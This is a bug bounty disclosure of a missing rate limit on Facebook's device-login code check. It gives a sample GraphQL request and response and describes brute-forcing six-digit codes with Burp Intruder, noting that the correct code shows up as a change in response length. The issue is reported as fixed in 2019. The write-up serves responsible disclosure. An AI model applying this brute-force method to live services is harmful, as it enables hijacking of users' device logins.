[Facebook] Device Code Verification missing rate limit

 There was a missing rate limit on a GraphQL call which was validating codes over Facebook for Devices feature.

POC -

Endpoint -

=================================

POST /v3.3/graphql?access_token=

Host:graph.facebook.com

doc_id=2400531753344072&format=json&method=post&variables={"shortCode":"123304"}

=================================

The response -

=================================

HTTP/1.1 200 OK

{"data":{"device_request_view":{"device_name":"","device_record":{"user_code":"123304","scope":"read_stream,publish_stream,user_photos,friends_photos,user_status,user_videos,friends_videos","auth_status":"ok","timestamp_expire":0,"code_type":null,"nonce":""},"application":{"name":"XXX","id":"XXX","square_logo":{"uri":"https:\/\/scontent.xx.fbcdn.net\/v\/t39.2080-6\/c0.0.129.129a\/p128x128\/851577_10151556502653700_1069381847_n.gif?_nc_cat=110&_nc_oc=AQnH03A0kVgSGcA9zSnc1r3ZlkjS3qOyQ_aWMQXsYdTOrbp13shMVwkaYYoN33IxDd4&_nc_ad=z-m&_nc_cid=2034&_nc_ht=scontent.xx&oh=56756b40ed65cc71725fa36aad4860cb&oe=5E491F85"}}}},"extensions":{"is_final":true}}

=================================

This would have allowed a malicious hacker to get correct pins and pop on a screen of a random device who wants to connect their account to a TV or such devices.

With the correct codes, the response will give away some additional info like - Device name, scope, name and ID with a logo photo link.

Rate limit evaluation -

With a thread upto 50 in burp intruder it was possible to make 1k requests in just 30 seconds. The response was always the same for every request that we make and changes only for the correct code. 4001th payload would show the same response as the 1st request and 4002th payload if hits the right code, it would show a different response length.

Timeline -

Reported - Saturday, November 16, 2019

Triaged - Wednesday, November 20, 2019

Fixed - Tuesday, December 3, 2019 

Rewarded - Wednesday, December 4, 2019